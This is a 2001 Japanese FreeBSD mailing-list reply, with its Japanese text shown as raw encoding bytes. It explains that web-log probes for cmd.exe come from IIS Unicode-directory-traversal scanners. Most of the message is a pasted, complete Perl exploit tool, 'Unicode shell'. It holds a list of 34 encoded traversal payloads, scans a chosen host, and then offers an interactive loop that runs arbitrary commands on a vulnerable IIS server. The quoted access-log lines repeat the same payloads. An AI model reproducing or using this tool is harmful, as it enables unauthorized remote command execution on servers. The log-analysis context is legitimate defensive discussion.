From owner-FreeBSD-users-jp@jp.freebsd.org  Wed Sep 19 04:13:00 2001
Received: (from daemon@localhost)
	by castle.jp.freebsd.org (8.9.3+3.2W/8.7.3) id EAA12408;
	Wed, 19 Sep 2001 04:13:00 +0900 (JST)
	(envelope-from owner-FreeBSD-users-jp@jp.FreeBSD.org)
Received: from mail.musuka.com (zaqd3789b2a.zaq.ne.jp [211.120.155.42])
	by castle.jp.freebsd.org (8.9.3+3.2W/8.7.3) with ESMTP id EAA12403
	for <FreeBSD-users-jp@jp.freebsd.org>; Wed, 19 Sep 2001 04:12:59 +0900 (JST)
	(envelope-from admin@musuka.com)
Received: from noren (noren [192.168.1.4])
	by mail.musuka.com (8.11.4+3.4W/8.11.4) with ESMTP id f8IJD0l01196
	for <FreeBSD-users-jp@jp.freebsd.org>; Wed, 19 Sep 2001 04:13:00 +0900 (JST)
Date: Wed, 19 Sep 2001 04:12:58 +0900
From: Matsumura  <matsumura@musuka.com>
To: FreeBSD-users-jp@jp.freebsd.org
In-Reply-To: <20010918134410.7415@mail.ca2.so-net.ne.jp>
References: <20010918134410.7415@mail.ca2.so-net.ne.jp>
Message-Id: <20010919041107.BA90.MATSUMURA@musuka.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.03
Reply-To: FreeBSD-users-jp@jp.freebsd.org
Precedence: list
X-Distribute: distribute version 2.1 (Alpha) patchlevel 24e+010328
X-Sequence: FreeBSD-users-jp 64362
Subject: [FreeBSD-users-jp 64362] Re: =?ISO-2022-JP?B?GyRCPzc8bxsoQg==?=
 =?ISO-2022-JP?B?GyRCISkbKEI=?= 
Errors-To: owner-FreeBSD-users-jp@jp.freebsd.org
Sender: owner-FreeBSD-users-jp@jp.freebsd.org
X-Originator: matsumura@musuka.com

$B$O$8$a$^$7$F!">>B<$H$$$$$^$9!#(B
$B$3$l$O!!(BCodeRed$B$H$+$H$OA4A34X78$J$/$F!"$?$@!!(BIIS$B$r;H$C$F$$$k$+$I$&$+$N%9(B
$B%-%c%s%W%m%0%i%`$G%9%-%c%s$5$l$F$$$k$@$1$@$H$*$b$$$^$9!#(B
$B;d$b$I$3$+$G=&$C$F$-$?(B($B<:Ni!&!&!&(B)$B%9%-%c%s$N$?$a$N(BPerl$B%9%/%j%W%H$,<j85$K$"(B
$B$j$^$9$N$G!"E=$jIU$1$F$*$-$^$9!#(B
$B<B9T$5$l$?%5!<%P$N%"%/%;%9%m%0$K$O3N$+$K$h$/;w$?$b$N$,;D$j$^$9!#(B
$B$3$s$J%9%/%j%W%H$N<{MW$,$"$k$/$i$$!"(BIIS$B$r;H$C$F$$$k%5!<%P$O3J9%$NI8E*(B($B2?$N(B??)
$B$K$J$k$s$G$7$g$&$M!#(B

---------$B$3$3$+$i(B------------------------------------------------------------
#!/usr/bin/perl -w

use strict;
use IO::Socket;

print "\nUnicode shell Version 2.0J\nWrited by Lion. Slightly modified by Vladimir.\nHonker SUX!! Honker Must DIE!!\n";

# (You can probably tell, but "Writed" is how the original text reads.)

# NOTE(review): as transmitted in this mail the Japanese text is ISO-2022-JP
# (see the Content-Type header), whose shift sequences contain the bytes
# `$B` ... `(B`.  Inside a Perl double-quoted string `$B` is a variable
# interpolation, which `use strict` rejects for an undeclared `$B`, so this
# listing presumably does not run byte-for-byte in this encoding -- the
# author's working copy would be in some other encoding.  Read it as a
# reference for what the httpd log lines quoted later in this message mean.

# Script-wide state; every subroutine below reads and writes these globals.
my $host;               # target host (read from STDIN in &host)
my $port;               # target port (read from STDIN in &host, default 80)
my $command;            # command string appended to the request path
my $url;                # the request path currently selected from @U
my @results;            # response lines captured by &connect
my $probe;              # "string" / "scan" / "command": selects what &connect sends and whether &output runs
my @U;                  # table of encoded request paths tried by &scan

# Entries to try can be appended to this table.
# Each entry is a different URL-encoding of the same traversal to cmd.exe,
# and each produces a distinct request-URI in the target's access log;
# the log excerpt quoted later in this message shows the resulting lines,
# all `GET ... cmd.exe?/c+dir HTTP/1.0` with "-" for referrer and user-agent.

# $U[0] always used for custom URL.
$U[1] = "/scripts/..%252f../winnt/system32/cmd.exe?/c+";
$U[2] = "/scripts/..%255c../winnt/system32/cmd.exe?/c+";
$U[3] = "/scripts/..%%35c../winnt/system32/cmd.exe?/c+";
$U[4] = "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+";
$U[5] = "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[6] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[7] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[8] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[9] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[10] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[11] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[12] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[13] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[14] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[15] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[16] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[17] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[18] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/scripts/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[20] = "/scripts/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[21] = "/scripts/msadc/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[22] = "/scripts/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[23] = "/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[24] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+";
$U[25] = "/msadc/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[26] = "/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[27] = "/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[28] = "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[29] = "/_vti_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[30] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[31] = "/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[32] = "/_vti_bin/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[33] = "/_vti_bin/msadc/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[34] = "/_vti_bin/msadc/..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";


# Main flow: banner/target prompt, table scan, path selection, command loop.
# Every sub is invoked with the `&name` form; the final &exit is only
# reached if &command returns, which it does not (it calls &exit itself).
&intro;
&scan;
&choose;
&command;
&exit;

sub intro {
# Startup sequence: contact line, interactive target entry, then the
# IIS banner probe in &server.  Pauses three seconds before returning.
&help;
&host;
&server;
sleep 3;
};

# $B%[%9%H$N%5%V%k!<%A%s(B
sub host {
# Reads the target into the globals $host and $port from STDIN.
# An empty host becomes "localhost"; a port that is empty or contains any
# non-digit character becomes "80".
print "\n$B%9%-%c%s$9$kL\I8(B: ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="localhost"};
print "\n$BL\I8$N%]!<%H(B($B%G%U%)%k%H$O(B80) : ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};

# IIS$B%5!<%P!<$rH=JL$9$k%5%V%k!<%A%s(B
sub server {
# Banner probe: with $probe = "string", &connect sends `HEAD / HTTP/1.0`
# and (because of the "string" probe) already echoes the response through
# &output before control returns here.  The response lines in @results
# are then searched for the substring "IIS".  If it is absent the user is
# warned and asked whether to continue; an answer containing N/n exits.
# Nothing else is checked -- a server that does not identify itself as
# IIS in its headers is reported as "not IIS" regardless of what it runs.
print "\nIIS$B$NH?1~$,F@$i$l$k$+;n$7$F$_$k(B...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
foreach $output (@results){
        if ($output =~/IIS/){ $webserver = "iis" };
        };
if ($webserver ne "iis"){
print "\a\a\n\n$B7Y9p(B:$B$3$NJ}<0$N%3!<%I$O;HMQ$G$-$^$;$s(B";
print "\n$B$3$N%7%9%F%`$O(BIIS$B%5!<%S%9$r;HMQ$7$F$$$^$;$s(B";
print "\nUnicod$B%;%-%e%j%F%#%[!<%k$OB8:_$7$^$;$s(B";
print "\n\n\n$BB3$1$^$9$+(B... [Y/N]";
my $choice = <STDIN>;
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\n$B$d$C$?$<!*$3$$$D$O(BIIS$B%5!<%P!<$@!*!*(B\n";
        };
};

# $B%9%-%c%s$N%5%V%k!<%A%s(B
sub scan {
# Tries every table entry $U[1] .. $U[$#U] in turn with $command = "dir"
# and $probe = "scan", one connection per entry (&connect does not echo
# the response for a "scan" probe).  An entry counts as a hit when any
# captured response line contains "Directory"; per-entry success/failure
# is printed, and if nothing matched the script exits via &exit.
# The loop starts at 1, so the custom slot $U[0] is never tried here.
# From the server side this is one request per table entry in quick
# succession, all ending in `cmd.exe?/c+dir` -- the pattern visible in the
# log excerpt quoted later in this message.
my $status = "not_vulnerable";
print "\n$B8=:_%&%'%V%5!<%P!<$r%9%-%c%s$7$F$$$^$9!'(B $host $B%]!<%H(B: $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };

if ($flag eq "0") {
print "\n$host$B%3!<%IJ}<0(B$loop$B$O<:GT(B:-(";
}else{
print "\a\a\a\n$host$B%3!<%IJ}<0(B$loop$B@.8y(B------Good!!!:-)";
     };
};
if ($status eq "not_vulnerable"){
                                print "\n\n$B$4$a$s$J$5$$!#(B $host$B$K$O(BUNICODE$B%;%-%e%j%F%#%[!<%k$,8+$D$+$j$^$;$s$G$7$?!#(B";
                                &exit;
                                };
}; # end scan subroutine.

# $B%3!<%I(BURL$B$rA*Br$9$k%5%V%k!<%A%s(B
sub choose {
# Prompts for an index into @U and stores the chosen path in the global
# $url.  An index of 0 first hands off to &other, which fills $U[0] with a
# user-supplied path.
# NOTE(review): the range check is `>` against the element count, so an
# index equal to scalar(@U) passes and yields undef; the non-digit check
# runs after the numeric comparison (a warning under -w for non-numeric
# input); and because the recursive &choose calls return here afterwards,
# an invalid $choice still reaches the `$U[$choice]` assignment below.
print "\n\n$B%3!<%IJ}<0$rA*$s$G$/$@$5$$(B [ $B$=$NB>$N>l9g$O(B0$B$rF~NO(B ]: ";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
print "HTTP://$host$url";
};

# $B$=$NB>$N%3!<%I(BURL$BA*Br%5%V%k!<%A%s(B

sub other {
# Reads a custom request path from STDIN into $U[0], the slot reserved for
# it in the table at the top of the file.  No validation is done on the
# input; &choose then assigns it to $url.
print "\nURL [$B$=$NB>$N%3%^%s%I(B]$BNc(B HTTP://$host\/scripts\/cmd.exe?\/+";
print "\nHTTP://$host";
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};

# $B%3%^%s%I$N%5%V%k!<%A%s(B
sub command {
# Interactive loop.  Each iteration prints the menu, reads a line into the
# global $command, dispatches the keywords quit/url/scan/host/help to the
# corresponding subs, then replaces whitespace with '+' and -- unless the
# line matched a keyword -- sends it via &connect with $probe = "command",
# which echoes the response.  The loop condition relies on $command, which
# &scan left as "dir" before this is first entered.  The trailing &exit is
# only reached if the loop exits by condition; the "quit" branch calls
# &exit directly.
# NOTE(review): all keyword tests are unanchored substring matches, and the
# ones on the dispatch lines are case-insensitive while the final guard is
# not, so e.g. an uppercase "URL" both triggers &choose and is then sent.
while ($command !~/quit/i) {
print "\n==============================\n\
$B%X%k%W(B\n$B%9%-%c%sCf;_!'(B            quit\n$B%3!<%I(BURL$B:F;n9T!'(B             url\n";
print "$B%9%-%c%s:F;n9T!'(B            scan\n$B$=$NB>$r%9%-%c%s!'(B             host\n$B%X%k%W$rD4$Y$k!'(B            help\n";
print "==============================\n\n$BL\I8>e$G%3%^%s%I$r<B9T$9$k(B\n$B<B9T$9$k%3%^%s%I$r<!$N$h$&$KF~NO$9$k!'(Bdir C: \n$B<B9T$9$k%3%^%s%I!'(B";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/host/i) { &host;&server;&scan;&choose };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|host|help/) {&connect};
};
&exit;
};

# $B@\B3%5%V%k!<%A%s(B
sub connect {
# Opens one TCP connection to $host:$port (dies, ending the whole script,
# if the connect fails).  Depending on the global $probe it sends either
# `GET $url$command HTTP/1.0` ("command" or "scan") or `HEAD / HTTP/1.0`
# ("string").  Both requests carry no further headers -- no Host, no
# User-Agent -- which is presumably why the quoted access-log lines show
# "-" for referrer and user-agent.  Response lines land in the global
# @results; &output is then called for "command" and "string" probes only.
# Note this user sub is always invoked as &connect (the ampersand selects
# it over Perl's builtin connect).
# NOTE(review): the while loop reads the first response line into $_ and
# discards it, then the list read slurps the remainder, so @results never
# contains the first line (the HTTP status line).
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
                                ) or die "\n $B$9$_$^$;$s!#%[%9%H(B$host$B$N%]!<%H(B$port$B$K@\B3$G$-$^$;$s$G$7$?(B\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};

# $BI=<(%5%V%k!<%A%s(B
sub output{
# Prints every line captured in @results, pausing one second after each
# line, so a long response takes as many seconds as it has lines.
print "\n$B%[%9%H%^%7%s$NI=<(!'(B $host. \n\n";
my $display;
foreach $display (@results){
                            print "$display";
                            sleep 1;
                                };
};

# $B=*N;%5%V%k!<%A%s(B
sub exit{
# Prints a farewell and terminates the process.  Everywhere else this is
# called as &exit, where the ampersand selects this sub; the bare `exit;`
# below is Perl's builtin, since defining a same-named sub does not
# override a builtin without importing it.
print "\n\n$B$4MxMQ$"$j$,$H$&$4$6$$$^$7$?!#(B:-)";
print "\n\n";
exit;
};


sub help {
# Despite the name, only prints the author's contact address; the actual
# menu text lives in &command.
print "Mail bug to infovlad\@263.net\n";
};


----$B$3$3$^$G(B-----------------------------------------------------------------

> $B!!$_$>$O$?$G$9!#(B
> 
> $B!!(Bhttpd $B$N%m%0$r8+$F$$$?$i!"0J2<$N$h$&$J0lO"$N%"%?%C%/$rLTNu$K<u$1$F(B
> $B$$$k$N$G$9$,!&!&!&(B root.exe $B$r;H$C$F$$$k$"$?$j!"(Bcode red $B4XO"$N?7<o(B
> $B$+$J!A$H;W$C$F$$$k$N$G$9$,!&!&!&(B202.*.*.* $B$N$+$J$j$$$m$$$m$J$H$3$m$+(B
> $B$i$d$C$F$-$F$$$^$9!#967b85$O$I$&$d$i(B Win NT $B$N$h$&$G$9!JA4ItD4$Y$?$o(B
> $B$1$G$O$"$j$^$;$s$,!K!#(B
> 
> ----------------------------------------------------------------------
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
> "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"
> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"
> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> ----------------------------------------------------------------------
> 
> $B!!$J$K$+>pJs$"$j$^$7$?$i$*4j$$$7$^$9!#(B
> 



_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
        Matsumura$B!!!w!!%`%9%+(B.com
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

